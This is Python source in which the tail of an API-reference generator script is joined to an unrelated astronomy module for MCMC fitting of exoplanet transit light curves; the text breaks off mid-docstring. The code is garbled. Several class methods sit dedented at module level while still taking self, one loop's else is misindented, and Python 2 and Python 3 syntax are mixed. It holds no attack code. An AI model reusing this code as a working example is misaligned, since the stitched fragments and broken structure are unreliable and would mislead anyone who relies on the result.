    members = list(get_class_methods(cls)) + list(get_class_attributes(cls))
    for member_name, _member_obj in members:
        write_simple_object_rst_file(qualified_prefix + member_name,
                                     short_doc_flag, doc_from_pandas_flag, add_sdc_sections)
def generate_api_reference():
    """
    Master function for API Reference generation.
    This function initializes all required data structures, and parses required templates for
    Final RST files generation that looks and feels like Pandas API Reference.
    """
    # Build the Pandas and SDC object trees first, then the Pandas->SDC
    # mapping that ties them together; only then can templates be expanded.
    init_pandas_structure()
    init_sdc_structure()
    init_pandas_sdc_dict()
    for templ_fname in APIREF_TEMPLATE_FNAMES:
        parse_templ_rst(templ_fname)
# Script entry point: regenerate the whole API Reference rst tree.
if __name__ == "__main__":
    generate_api_reference()
| |
import sys
import numpy as np
#import matplotlib.pyplot as plt
import emcee
import tmodtom as tmod
import time as thetime
from scipy.stats import truncnorm
from claretquadpy import claretquad
from claret4ppy import claretlimb4p
from copy import deepcopy
from numpy import random
#from bilin_interp import ld_quad
class transitemcee(object):
    """Transit light-curve MCMC fitting harness built around emcee and a
    fortran transit model (``tmodtom``).

    Holds the light curve, stellar parameters, limb darkening and per-planet
    transit parameters, and produces starting positions for an emcee ensemble.

    NOTE(review): this module is Python 2 code (``print`` statements,
    ``xrange``); it will not run under Python 3 without porting.
    """
    def __init__(self,nplanets,cadence=1625.3,
        ldfileloc='/Users/tom/svn_code/tom_code/',
        codedir='/Users/tom/svn_code/tom_code/'):
        # codedir is appended to sys.path so sibling fitting modules located
        # there can be imported.
        sys.path.append(codedir)
        self.nplanets = nplanets
        nmax = 1500000 #from the fortran
        # Transit-timing bookkeeping arrays sized to the fortran model's
        # fixed maximum.
        self._ntt = np.zeros(nplanets)
        self._tobs = np.empty([self.nplanets,nmax])
        self._omc = np.empty([self.nplanets,nmax])
        # Cadence is supplied in seconds; stored in days.
        self.cadence = cadence / 86400.
        self.allow_ecc_orbit = False
        self.ldfileloc = ldfileloc
        self.onlytransits = False
        self.tregion = 500
    def get_stellar(self,teff,logg,FeH,n_ldparams=4):
        """
        read in stellar parameters
        inputs
        teff : float
            The effective temperature of the star
        logg : float
            the surface gravity of the star in log cgs
        FeH : float
            the metalicity of the star in log solar
        optional
        n_ldparams : int
            number of limb-darkening coefficients to read (2 or 4)
        """
        self.Teff = teff
        self.logg = logg
        self.FeH = FeH
        if n_ldparams == 2:
            #if teff < 3500 and logg >= 3.5:
            if False:
                #this block should never run
                # NOTE(review): ld_quad's import is commented out at the top
                # of the module; enabling this branch would raise NameError.
                ldfile = self.ldfileloc + 'claret-quad-phoenix.txt'
                self.ld1,self.ld2 = ld_quad(ldfile,
                    self.Teff,self.logg)
                self.ld3 = 0.0
                self.ld4 = 0.0
            #elif logg < 3.5 or teff >= 3500:
            if True:
                # Quadratic limb darkening: ld3/ld4 fixed to zero.
                ldfile = self.ldfileloc + 'claret-limb-quad.txt'
                self.ld1,self.ld2 = claretquad(ldfile,
                    self.Teff,self.logg,self.FeH)
                self.ld3 = 0.0
                self.ld4 = 0.0
        elif n_ldparams == 4:
            # Four-parameter (nonlinear) limb darkening.
            ldfile = self.ldfileloc + 'claret-limb.txt'
            self.ld1,self.ld2,self.ld3,self.ld4 = claretlimb4p(ldfile,
                self.Teff,self.logg,self.FeH)
    def open_lightcurve(self,filename,timeoffset=0.0,
        normalize=False):
        # Load a 3-column (time, flux, err) text light curve; optionally
        # normalize flux and err by the median flux.
        t = np.genfromtxt(filename).T
        time = t[0] - timeoffset
        if normalize:
            flux = t[1] / np.median(t[1])
            err = t[2] / np.median(t[1])
        else:
            flux = t[1]
            err = t[2]
        self.time = time
        self.flux = flux
        self.err = err
        self.npt = len(time)
        # Per-point integration time and data-type flags for the model.
        self._itime = np.zeros(self.npt) + self.cadence
        self._datatype = np.zeros(self.npt)
    def already_open(self,t1,f1,e1,timeoffset=0.0,normalize=False):
        # Same as open_lightcurve, but for arrays already held in memory.
        time = t1 - timeoffset
        if normalize:
            flux = f1 / np.median(f1)
            err = e1 / np.median(f1)
        else:
            flux = f1
            err = e1
        self.time = time
        self.flux = flux
        self.err = err
        self.npt = len(time)
        self._itime = np.zeros(self.npt) + self.cadence
        self._datatype = np.zeros(self.npt)
    def get_rho(self,rho_vals,prior=False,rho_start=0.0,
        rho_stop = 30.):
        """
        inputs
        rho_vals : array_like
            Two parameter array with value
            rho, rho_unc
        prior : bool, optional
            should this rho be used as a prior?
        rho_start, rho_stop : float, optional
            allowed range of the mean stellar density
        """
        self.rho_0 = rho_vals[0]
        self.rho_0_unc = rho_vals[1]
        self.rho_0_start = rho_start
        self.rho_0_stop = rho_stop
        if prior:
            self.rho_prior = True
        else:
            self.rho_prior = False
    def get_zpt(self,zpt_0):
        # Photometric zero point; exactly zero is nudged to a tiny value so
        # downstream scale parameters stay non-degenerate.
        self.zpt_0 = zpt_0
        if self.zpt_0 == 0.0:
            self.zpt_0 = 1.E-10
    def get_sol(self,*args,**kwargs):
        """
        reads the guess transit fit solution
        There are 6 args for every planet
        T0, period, impact paramter, rp/rs, ecosw and esinw
        optional keywords, these are kept fixed (for now)
        dil : float, optional
            dilution
        veloffset : float, optional
            velocity zeropoint
        rvamp : float, optional
            radial velocity amplitude from doppler beaming
        occ : float, optional
            occultation depth
        ell : float, optional
            amplitude of ellipsoidal variations
        alb : float, optional
            geometric albedo of the planet
        """
        assert len(args) == self.nplanets * 6
        if 'dil' in kwargs.keys():
            dil = kwargs['dil']
            print ' running with dil = %s' %(dil)
        else:
            dil = 0.0
        if 'veloffset' in kwargs.keys():
            veloffset = kwargs['veloffset']
        else:
            veloffset = 0.0
        if 'rvamp' in kwargs.keys():
            rvamp = kwargs['rvamp']
        else:
            rvamp = 0.0
        if 'occ' in kwargs.keys():
            occ = kwargs['occ']
        else:
            occ = 0.0
        if 'ell' in kwargs.keys():
            ell = kwargs['ell']
        else:
            ell = 0.0
        if 'alb' in kwargs.keys():
            alb = kwargs['alb']
        else:
            alb = 0.0
        # Ensure the zero point is usable even if get_zpt was never called
        # (AttributeError) or was called with exactly zero.
        try:
            if self.zpt_0 == 0.:
                self.zpt_0 = 1.E-10
        except AttributeError:
            self.zpt_0 = 1.E-10
            self.zpt_0_unc = 1.E-6
        # fit_sol layout: [rho, zpt] followed by
        # (T0, per, b, rprs, ecosw, esinw) for each planet.
        fit_sol = np.array([self.rho_0,self.zpt_0])
        for i in xrange(self.nplanets):
            T0_0 = args[i*6]
            per_0 = args[i*6 +1]
            b_0 = args[i*6 +2]
            rprs_0 = args[i*6 +3]
            ecosw_0 = args[i*6 +4]
            esinw_0 = args[i*6 +5]
            new_params = np.array([T0_0,per_0,
                b_0,rprs_0,ecosw_0,esinw_0])
            fit_sol = np.r_[fit_sol,new_params]
        self.fit_sol = fit_sol
        self.fit_sol_0 = deepcopy(self.fit_sol)
        # Parameters held fixed during the fit.
        self.fixed_sol = np.array([self.ld1,self.ld2,
            self.ld3,self.ld4,
            dil,veloffset,rvamp,
            occ,ell,alb])
    def cut_non_transit(self,ntdur=10):
        # Trim the light curve to windows of +/- ntdur transit durations
        # around every expected transit of every planet.
        #make a mask for each planet candidate
        self.onlytransits = True
        tregion = np.zeros(self.nplanets)
        maskdat = np.zeros([self.npt,self.nplanets],dtype=bool)
        for i in xrange(self.nplanets):
            # fit_sol layout is [rho, zpt, T0, per, ...] per planet.
            T0 = self.fit_sol[i*6 + 2]
            per = self.fit_sol[i*6 + 3]
            rho = self.fit_sol[0]
            ars = self.get_ar(rho,per)
            # Approximate transit duration in days for a central transit.
            tdur_dys = (1./ars) * per * (1./np.pi)
            #this is buggy because T0 is not nessessarily time of first transit
            #but time of a transit. So fudge.
            #subtract make T0 the first transit
            # NOTE(review): time0 is computed below but never used afterwards
            # (t_times is built from T0 directly) -- dead code, confirm.
            time0 = np.copy(T0)
            while True:
                if time0 - per < self.time[0]:
                    break
                else:
                    time0 = time0 - per
            ntransits = int((self.time[-1] - self.time[0]) / per) + 1
            t_times = np.arange(ntransits)*per + T0
            #make sure the first and last transit are not excluded even if
            #partially in the data
            t_times = np.r_[t_times,t_times[0] - per,t_times[-1] + per]
            for j in t_times:
                maskdat[:,i] = np.logical_or(maskdat[:,i],
                    np.logical_and(
                    self.time < j +tdur_dys*ntdur,
                    self.time > j - tdur_dys*ntdur) )
            tregion[i] = ntdur*tdur_dys
        #create a final mask that is the OR of the
        #individual masks
        finmask = np.zeros(self.npt)
        for i in xrange(self.nplanets):
            finmask = np.logical_or(finmask,maskdat[:,i])
        self.time = self.time[finmask]
        self.flux = self.flux[finmask]
        self.err = self.err[finmask]
        self._itime = self._itime[finmask]
        self._datatype = self._datatype[finmask]
        self.tregion = tregion
    def get_ar(self,rho,period):
        """ gets a/R* from period and mean stellar density"""
        # Kepler's third law rearranged: a/R* = (G * rho * P^2 / (3 pi))^(1/3)
        # with rho converted from g/cc to kg/m^3 and the period to seconds.
        G = 6.67E-11
        rho_SI = rho * 1000.
        tpi = 3. * np.pi
        period_s = period * 86400.
        part1 = period_s**2 * G * rho_SI
        ar = (part1 / tpi)**(1./3.)
        return ar
    # def calc_model(self,fitsol):
    #     sol = np.zeros([8 + 10*self.nplanets])
    #     rho = fitsol[0]
    #     zpt = fitsol[1]
    #     ld1,ld2,ld3,ld4 = self.fixed_sol[0:4]
    #     dil = self.fixed_sol[4]
    #     veloffset = self.fixed_sol[5]
    #     fixed_stuff = self.fixed_sol[6:10]
    #     sol[0:8] = np.array([rho,ld1,ld2,ld3,ld4,
    #         dil,veloffset,zpt])
    #     for i in xrange(self.nplanets):
    #         sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6],fixed_stuff]
    #     tmodout = tmod.transitmodel(self.nplanets,sol,self.time,self._itime,
    #         self._ntt,self._tobs,self._omc,self._datatype)
    #     return tmodout - 1.
    # def logchi2(self,fitsol):
    #     rho = fitsol[0]
    #     if rho < 0.001 or rho > 30.:
    #         return -np.inf
    #     rprs = fitsol[np.arange(self.nplanets)*6 + 5]
    #     if np.any(rprs < 0.) or np.any(rprs > 0.5):
    #         return -np.inf
    #     ecosw = fitsol[np.arange(self.nplanets)*6 + 6]
    #     if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
    #         return -np.inf
    #     esinw = fitsol[np.arange(self.nplanets)*6 + 7]
    #     if np.any(esinw < -1.0) or np.any(esinw > 1.0):
    #         return -np.inf
    #     b = fitsol[np.arange(self.nplanets)*6 + 4]
    #     if np.any(b < 0.) or np.any(b > 1.0 + rprs):
    #         return -np.inf
    #     model_lc = self.calc_model(fitsol)
    #     if self.rho_prior:
    #         chi2prior = (self.rho_0 - rho)**2 / self.rho_0_unc**2
    #     else:
    #         chi2prior = 0.0
    #     chi2val = np.sum((model_lc - self.flux)**2 / self.err**2)
    #     chi2tot = chi2val + chi2prior
    #     logp = -chi2tot / 2.
    #     return logp
    # def do_emcee(self,nwalkers,threads=16,burnin=100,fullrun=1000):
    #     l_var = 8
    #     p0 = self.get_guess(nwalkers)
    #     sampler = emcee.EnsembleSampler(nwalkers, l_var, self.logchi2,
    #         threads=threads)
    #     time1 = thetime.time()
    #     pos, prob, state = sampler.run_mcmc(p0, burnin)
    #     sampler.reset()
    #     time2 = thetime.time()
    #     print 'burn-in took ' + str((time2 - time1)/60.) + ' min'
    #     time1 = thetime.time()
    #     sampler.run_mcmc(pos, fullrun)
    #     time2 = thetime.time()
    #     print 'MCMC run took ' + str((time2 - time1)/60.) + ' min'
    #     print
    #     print("Mean acceptance: "
    #         + str(np.mean(sampler.acceptance_fraction)))
    #     print
    #     try:
    #         print("Autocorrelation times sampled:", fullrun / sampler.acor)
    #     except RuntimeError:
    #         print("No Autocorrelation")
    #     return sampler, (time2 - time1)/60.
    def get_guess(self,nwalkers):
        """
        pick sensible starting ranges for the guess parameters
        T0, period, impact paramter, rp/rs, ecosw and esinw
        """
        # Per-parameter scatter used to jitter walkers around the guess.
        rho_unc = 0.001
        # NOTE(review): zpt_unc is defined but never used -- the zero point
        # below is drawn with scale=zpt (the value itself), which looks like
        # a bug; confirm whether scale=zpt_unc was intended.
        zpt_unc = 1.E-8
        T0_unc = 0.0002
        per_unc = 0.00005
        b_unc = 0.001
        rprs_unc = 0.0001
        ecosw_unc = 0.001
        esinw_unc = 0.001
        p0 = np.zeros([nwalkers,2+self.nplanets*6])
        rho = self.fit_sol[0]
        zpt = self.fit_sol[1]
        # Truncated normals keep every walker inside the prior bounds.
        start,stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
        p0[...,0] = truncnorm.rvs(start,stop
            ,loc=rho,scale=rho_unc,size=nwalkers)
        p0[...,1] = np.random.normal(loc=zpt,scale=zpt,size=nwalkers)
        for i in xrange(self.nplanets):
            T0,per,b,rprs,ecosw,esinw = self.fit_sol[i*6+2:i*6 + 8]
            # b, ecosw, esinw are deliberately started at zero regardless of
            # the guess solution.
            b = 0.0
            ecosw = 0.0
            esinw = 0.0
            p0[...,i*6+2] = np.random.normal(T0,T0_unc,size=nwalkers)
            p0[...,i*6+3] = np.random.normal(per,per_unc,size=nwalkers)
            start,stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
            p0[...,i*6+4] = truncnorm.rvs(start,stop
                ,loc=b,scale=b_unc,size=nwalkers)
            start,stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
            p0[...,i*6+5] = truncnorm.rvs(start,stop
                ,loc=rprs,scale=rprs_unc,size=nwalkers)
            start,stop = (0.0 - ecosw) / ecosw_unc, (0.5 - ecosw) / ecosw_unc
            p0[...,i*6+6] = truncnorm.rvs(start,stop
                ,loc=ecosw,scale=ecosw_unc,size=nwalkers)
            start,stop = (0.0 - esinw) / esinw_unc, (0.5 - esinw) / esinw_unc
            p0[...,i*6+7] = truncnorm.rvs(start,stop
                ,loc=esinw,scale=esinw_unc,size=nwalkers)
        return p0
class transitemcee_paramprior(transitemcee):
    def __init__(self,nplanets,cadence=1626.3,
        ldfileloc='/Users/tom/svn_code/tom_code/'):
        # Delegates setup to the base class (the base ``codedir`` argument is
        # left at its default).
        # NOTE(review): default cadence here (1626.3) differs from the base
        # class default (1625.3) -- confirm which value is intended.
        transitemcee.__init__(self,nplanets,cadence,ldfileloc)
def get_stellar(self,teff,teff_unc,logg,logg_unc,FeH,FeH_unc,
n_ldparams=2):
"""
read in stellar parameters
inputs
teff : float
The effective temperature of the star
logg : float
the surface gravity of the star in log cgs
FeH : float
the metalicity of the star in log solar
optional
n_ldparams : int
"""
self.Teff = teff
self.Teff_unc = teff_unc
self.logg = logg
self.logg_unc = logg_unc
self.FeH = FeH
self.FeH_unc = FeH_unc
self.n_ldparams = n_ldparams
    def get_sol(self,*args,**kwargs):
        """
        reads the guess transit fit solution
        There are 6 args for every planet
        T0, period, impact paramter, rp/rs, ecosw and esinw
        optional keywords, these are kept fixed (for now)
        dil : float, optional
            dilution
        veloffset : float, optional
            velocity zeropoint
        rvamp : float, optional
            radial velocity amplitude from doppler beaming
        occ : float, optional
            occultation depth
        ell : float, optional
            amplitude of ellipsoidal variations
        alb : float, optional
            geometric albedo of the planet
        """
        assert len(args) == self.nplanets * 6
        if 'dil' in kwargs.keys():
            dil = kwargs['dil']
            print ' running with dil = %s' %(dil)
        else:
            dil = 0.0
        if 'veloffset' in kwargs.keys():
            veloffset = kwargs['veloffset']
        else:
            veloffset = 0.0
        if 'rvamp' in kwargs.keys():
            rvamp = kwargs['rvamp']
        else:
            rvamp = 0.0
        if 'occ' in kwargs.keys():
            occ = kwargs['occ']
        else:
            occ = 0.0
        if 'ell' in kwargs.keys():
            ell = kwargs['ell']
        else:
            ell = 0.0
        if 'alb' in kwargs.keys():
            alb = kwargs['alb']
        else:
            alb = 0.0
        # Ensure the zero point is usable even if get_zpt was never called
        # (AttributeError) or was called with exactly zero.
        try:
            if self.zpt_0 == 0.:
                self.zpt_0 = 1.E-10
        except AttributeError:
            self.zpt_0 = 1.E-10
            self.zpt_0_unc = 1.E-6
        # fit_sol layout: [rho, zpt, Teff, logg, FeH] followed by
        # (T0, per, b, rprs, ecosw, esinw) for each planet -- unlike the base
        # class, the stellar parameters are sampled here.
        fit_sol = np.array([self.rho_0,self.zpt_0,self.Teff,self.logg,self.FeH])
        for i in xrange(self.nplanets):
            T0_0 = args[i*6]
            per_0 = args[i*6 +1]
            b_0 = args[i*6 +2]
            rprs_0 = args[i*6 +3]
            ecosw_0 = args[i*6 +4]
            esinw_0 = args[i*6 +5]
            new_params = np.array([T0_0,per_0,
                b_0,rprs_0,ecosw_0,esinw_0])
            fit_sol = np.r_[fit_sol,new_params]
        self.fit_sol = fit_sol
        self.fit_sol_0 = deepcopy(self.fit_sol)
        # Limb darkening is not part of fixed_sol here: it is derived from
        # the sampled Teff/logg/FeH instead (contrast with the base class).
        self.fixed_sol = np.array([
            dil,veloffset,rvamp,
            occ,ell,alb])
def get_guess(self, nwalkers):
    """
    Draw sensible per-walker starting positions around the guess solution.

    Bounded quantities (rho, Teff, logg, [Fe/H], b, rp/rs, ecosw, esinw)
    use truncated normals so no walker starts outside its hard prior
    range; T0, period and the zero-point use plain Gaussians.

    nwalkers : int
        number of emcee walkers

    Returns
    -------
    p0 : ndarray of shape (nwalkers, 5 + 6*nplanets)
    """
    # per-parameter scatter widths for the starting ball
    rho_unc = 0.001
    zpt_unc = 1.E-8
    teff_unc = 10
    logg_unc = 0.01
    feh_unc = 0.01
    T0_unc = 0.0002
    per_unc = 0.00005
    b_unc = 0.001
    rprs_unc = 0.0001
    ecosw_unc = 0.001
    esinw_unc = 0.001
    p0 = np.zeros([nwalkers, 5+self.nplanets*6])
    rho = self.fit_sol[0]
    zpt = self.fit_sol[1]
    teff = self.fit_sol[2]
    logg = self.fit_sol[3]
    feh = self.fit_sol[4]
    start, stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
    p0[..., 0] = truncnorm.rvs(start, stop,
                               loc=rho, scale=rho_unc, size=nwalkers)
    # BUGFIX: the scale previously used the value zpt itself
    # (scale=zpt); zpt_unc was defined above but never used.
    p0[..., 1] = np.random.normal(loc=zpt, scale=zpt_unc, size=nwalkers)
    start, stop = (3500. - teff) / teff_unc, (50000. - teff) / teff_unc
    p0[..., 2] = truncnorm.rvs(start, stop,
                               loc=teff, scale=teff_unc, size=nwalkers)
    start, stop = (0.0 - logg) / logg_unc, (5. - logg) / logg_unc
    p0[..., 3] = truncnorm.rvs(start, stop,
                               loc=logg, scale=logg_unc, size=nwalkers)
    start, stop = (-5.0 - feh) / feh_unc, (1.0 - feh) / feh_unc
    p0[..., 4] = truncnorm.rvs(start, stop,
                               loc=feh, scale=feh_unc, size=nwalkers)
    for i in range(self.nplanets):
        T0, per, b, rprs, ecosw, esinw = self.fit_sol[i*6+5:i*6 + 11]
        # start every walker at a central transit on a circular orbit
        b = 0.0
        ecosw = 0.0
        esinw = 0.0
        p0[..., i*6+5] = np.random.normal(T0, T0_unc, size=nwalkers)
        p0[..., i*6+6] = np.random.normal(per, per_unc, size=nwalkers)
        start, stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
        p0[..., i*6+7] = truncnorm.rvs(start, stop,
                                       loc=b, scale=b_unc, size=nwalkers)
        start, stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
        p0[..., i*6+8] = truncnorm.rvs(start, stop,
                                       loc=rprs, scale=rprs_unc,
                                       size=nwalkers)
        start, stop = (0.0 - ecosw) / ecosw_unc, (0.5 - ecosw) / ecosw_unc
        p0[..., i*6+9] = truncnorm.rvs(start, stop,
                                       loc=ecosw, scale=ecosw_unc,
                                       size=nwalkers)
        start, stop = (0.0 - esinw) / esinw_unc, (0.5 - esinw) / esinw_unc
        p0[..., i*6+10] = truncnorm.rvs(start, stop,
                                        loc=esinw, scale=esinw_unc,
                                        size=nwalkers)
    return p0
def cut_non_transit(self, ntdur=10):
    """
    Trim the light curve to windows around each planet's transits.

    Keeps only cadences within +/- ntdur transit durations of any
    predicted transit time of any planet, then records the half-width
    of the kept window per planet in self.tregion and sets
    self.onlytransits = True.

    ntdur : int, optional
        half-width of the kept window, in transit durations
    """
    #make a mask for each planet candidate
    self.onlytransits = True
    tregion = np.zeros(self.nplanets)
    maskdat = np.zeros([self.npt, self.nplanets], dtype=bool)
    for i in xrange(self.nplanets):
        T0 = self.fit_sol[i*6 + 5]
        per = self.fit_sol[i*6 + 6]
        rho = self.fit_sol[0]
        ars = self.get_ar(rho, per)
        # transit duration in days for a central transit: P/(pi * a/R*)
        tdur_dys = (1./ars) * per * (1./np.pi)
        #this is buggy because T0 is not nessessarily time of first transit
        #but time of a transit. So fudge.
        #subtract make T0 the first transit
        time0 = np.copy(T0)
        # NOTE(review): time0 is wound back to before the start of the
        # data but never used afterwards -- the transit times below are
        # built from T0 directly, so this loop appears to be dead code.
        while True:
            if time0 - per < self.time[0]:
                break
        else:
                time0 = time0 - per
        ntransits = int((self.time[-1] - self.time[0]) / per) + 1
        t_times = np.arange(ntransits)*per + T0
        #make sure the first and last transit are not excluded even if
        #partially in the data
        t_times = np.r_[t_times, t_times[0] - per, t_times[-1] + per]
        for j in t_times:
            # OR-in every cadence within the window around transit time j
            maskdat[:, i] = np.logical_or(maskdat[:, i],
                np.logical_and(
                    self.time < j + tdur_dys*ntdur,
                    self.time > j - tdur_dys*ntdur))
        tregion[i] = ntdur*tdur_dys
    #create a final mask that is the OR of the
    #individual masks
    finmask = np.zeros(self.npt)
    for i in xrange(self.nplanets):
        finmask = np.logical_or(finmask, maskdat[:, i])
    # apply the boolean mask to every per-cadence array we carry
    self.time = self.time[finmask]
    self.flux = self.flux[finmask]
    self.err = self.err[finmask]
    self._itime = self._itime[finmask]
    self._datatype = self._datatype[finmask]
    self.tregion = tregion
class transitemcee_paramprior_occ(transitemcee_paramprior):
    """
    Placeholder subclass: currently identical to transitemcee_paramprior.

    Presumably reserved for an occultation-fitting variant; nothing is
    overridden yet.
    """
    pass
class transitemcee_fitldp(transitemcee):
    """
    Transit-fit model where the limb-darkening coefficients are free
    parameters.

    The Claret-table values only seed the fit (optionally with a
    Gaussian prior, see ldp_prior), and a white-noise jitter term is
    appended as the final fit parameter.
    """

    def __init__(self, nplanets, cadence=1626.3,
                 ldfileloc='/Users/tom/svn_code/tom_code/',
                 codedir='/Users/tom/svn_code/tom_code/'):
        transitemcee.__init__(self, nplanets, cadence, ldfileloc, codedir)

    def get_stellar(self, teff, logg, FeH,
                    n_ldparams=2, ldp_prior=True):
        """
        Read in stellar parameters and seed the limb darkening.

        teff : float
            effective temperature of the star (K)
        logg : float
            surface gravity of the star in log cgs
        FeH : float
            metallicity of the star in log solar
        n_ldparams : int, optional
            2 for the quadratic law, 4 for the 4-parameter Claret law
        ldp_prior : bool, optional
            whether to apply a Gaussian prior on the limb darkening
        """
        self.Teff = teff
        self.logg = logg
        self.FeH = FeH
        # default 1-sigma widths for the limb-darkening prior
        self.ld1_unc = 0.1
        self.ld2_unc = 0.1
        self.ld3_unc = 0.1
        self.ld4_unc = 0.1
        # clamp the lookup values to the range covered by the Claret
        # tables; the prior widths are adjusted at the table edges
        if teff < 3500:
            teff = 3500
            self.ld1_unc = 0.2
            self.ld2_unc = 0.2
        if logg < 0.0:
            logg = 0.0
            self.ld1_unc = 0.05
            self.ld2_unc = 0.05
        if logg > 5.0:
            logg = 5.0
            self.ld1_unc = 0.05
            self.ld2_unc = 0.05
        if FeH < -5.0:
            FeH = -5.0
            self.ld1_unc = 0.05
            self.ld2_unc = 0.05
        if FeH > 1.0:
            FeH = 1.0
            self.ld1_unc = 0.05
            self.ld2_unc = 0.05
        if n_ldparams == 2:
            ldfile = self.ldfileloc + 'claret-limb-quad.txt'
            self.ld1, self.ld2 = claretquad(ldfile,
                                            teff, logg, FeH)
            self.ld3 = 0.0
            self.ld4 = 0.0
            # teff was already clamped to 3500 above, so this repeats
            # the lookup just done; kept for parity with the original
            if teff < 3500:
                self.ld1, self.ld2 = claretquad(ldfile,
                                                3500., logg, FeH)
        elif n_ldparams == 4:
            ldfile = self.ldfileloc + 'claret-limb.txt'
            self.ld1, self.ld2, self.ld3, self.ld4 = claretlimb4p(
                ldfile,
                self.Teff, self.logg, self.FeH)
        self.ldp_prior = ldp_prior
        self.n_ldparams = n_ldparams

    def get_sol(self, *args, **kwargs):
        """
        Read the initial guess for the transit fit solution.

        There are 6 positional args for every planet:
        T0, period, impact parameter, rp/rs, ecosw and esinw.

        Optional keywords (these are kept fixed for now):
        dil : float, optional
            dilution
        veloffset : float, optional
            velocity zeropoint
        rvamp : float, optional
            radial velocity amplitude from doppler beaming
        occ : float, optional
            occultation depth
        ell : float, optional
            amplitude of ellipsoidal variations
        alb : float, optional
            geometric albedo of the planet
        """
        assert len(args) == self.nplanets * 6
        dil = kwargs.get('dil', 0.0)
        if 'dil' in kwargs:
            print(' running with dil = %s' % (dil))
        veloffset = kwargs.get('veloffset', 0.0)
        rvamp = kwargs.get('rvamp', 0.0)
        occ = kwargs.get('occ', 0.0)
        ell = kwargs.get('ell', 0.0)
        alb = kwargs.get('alb', 0.0)
        # nudge a zero zero-point off zero; also handles the attribute
        # not having been set yet
        try:
            if self.zpt_0 == 0.:
                self.zpt_0 = 1.E-10
        except AttributeError:
            self.zpt_0 = 1.E-10
        self.zpt_0_unc = 1.E-6
        # layout: [rho, zpt, ld1, ld2(, ld3, ld4)] + 6 params per planet
        if self.n_ldparams == 2:
            fit_sol = np.array([self.rho_0, self.zpt_0,
                                self.ld1, self.ld2])
        elif self.n_ldparams == 4:
            fit_sol = np.array([self.rho_0, self.zpt_0,
                                self.ld1, self.ld2, self.ld3, self.ld4])
        for i in range(self.nplanets):
            # T0, per, b, rprs, ecosw, esinw for planet i
            fit_sol = np.r_[fit_sol, np.array(args[i*6:i*6 + 6])]
        self.fit_sol = fit_sol
        self.fit_sol_0 = deepcopy(self.fit_sol)
        self.fixed_sol = np.array([
            dil, veloffset, rvamp,
            occ, ell, alb])

    def get_guess(self, nwalkers):
        """
        Draw per-walker starting positions around the guess solution.

        Returns an array of shape (nwalkers, ndim) with columns
        [rho, zpt, ld1, ld2(, ld3, ld4)] + 6 per planet + jitter.
        """
        rho_unc = 0.1
        zpt_unc = 1.E-8
        ld1_unc = 0.05
        ld2_unc = 0.05
        ld3_unc = 0.05
        ld4_unc = 0.05
        T0_unc = 0.0002
        per_unc = 0.00005
        b_unc = 0.001
        rprs_unc = 0.0001
        ecosw_unc = 0.001
        esinw_unc = 0.001
        # the +1 column at the end is the jitter term
        if self.n_ldparams == 2:
            p0 = np.zeros([nwalkers, 4+self.nplanets*6+1])
        elif self.n_ldparams == 4:
            p0 = np.zeros([nwalkers, 6+self.nplanets*6+1])
        rho = self.fit_sol[0]
        zpt = self.fit_sol[1]
        ld1 = self.fit_sol[2]
        ld2 = self.fit_sol[3]
        if self.n_ldparams == 4:
            ld3 = self.fit_sol[4]
            ld4 = self.fit_sol[5]
            # per-planet columns shift right by two when ld3/ld4 are fit
            addval = 2
            start, stop = (0.0 - ld3) / ld3_unc, (1.0 - ld3) / ld3_unc
            p0[..., 4] = truncnorm.rvs(start, stop,
                                       loc=ld3, scale=ld3_unc,
                                       size=nwalkers)
            start, stop = (0.0 - ld4) / ld4_unc, (1.0 - ld4) / ld4_unc
            p0[..., 5] = truncnorm.rvs(start, stop,
                                       loc=ld4, scale=ld4_unc,
                                       size=nwalkers)
        else:
            addval = 0
        start, stop = (0.0001 - rho) / rho_unc, (30.0 - rho) / rho_unc
        p0[..., 0] = truncnorm.rvs(start, stop,
                                   loc=rho, scale=rho_unc, size=nwalkers)
        # BUGFIX: the scale previously used the value zpt itself
        # (scale=zpt); zpt_unc was defined above but never used.
        p0[..., 1] = np.random.normal(loc=zpt, scale=zpt_unc,
                                      size=nwalkers)
        start, stop = (0.0 - ld1) / ld1_unc, (1.0 - ld1) / ld1_unc
        p0[..., 2] = truncnorm.rvs(start, stop,
                                   loc=ld1, scale=ld1_unc, size=nwalkers)
        start, stop = (0.0 - ld2) / ld2_unc, (1.0 - ld2) / ld2_unc
        p0[..., 3] = truncnorm.rvs(start, stop,
                                   loc=ld2, scale=ld2_unc, size=nwalkers)
        for i in range(self.nplanets):
            (T0, per, b, rprs, ecosw,
             esinw) = self.fit_sol[i*6+4+addval:i*6 + 10+addval]
            # start walkers near-central on a circular orbit
            b = 0.2
            ecosw = 0.0
            esinw = 0.0
            p0[..., i*6+4+addval] = np.random.normal(
                T0, T0_unc, size=nwalkers)
            p0[..., i*6+5+addval] = np.random.normal(
                per, per_unc, size=nwalkers)
            start, stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
            p0[..., i*6+6+addval] = truncnorm.rvs(
                start, stop,
                loc=b, scale=b_unc, size=nwalkers)
            start, stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
            p0[..., i*6+7+addval] = truncnorm.rvs(
                start, stop,
                loc=rprs, scale=rprs_unc, size=nwalkers)
            start, stop = ((0.0 - ecosw) / ecosw_unc,
                           (0.5 - ecosw) / ecosw_unc)
            p0[..., i*6+8+addval] = truncnorm.rvs(
                start, stop,
                loc=ecosw, scale=ecosw_unc, size=nwalkers)
            start, stop = ((0.0 - esinw) / esinw_unc,
                           (0.5 - esinw) / esinw_unc)
            p0[..., i*6+9+addval] = truncnorm.rvs(
                start, stop,
                loc=esinw, scale=esinw_unc, size=nwalkers)
        #this is the jitter term
        #make it like self.err
        errterm = np.median(self.err)
        start, stop = 0.0, 10.
        p0[..., -1] = truncnorm.rvs(start, stop,
                                    loc=0.0, scale=0.1*errterm,
                                    size=nwalkers)
        return p0

    def cut_non_transit(self, ntdur=10):
        """
        Trim the light curve to windows around each planet's transits.

        Same as the base behaviour, but the per-planet T0/period live
        at an offset that depends on how many limb-darkening terms are
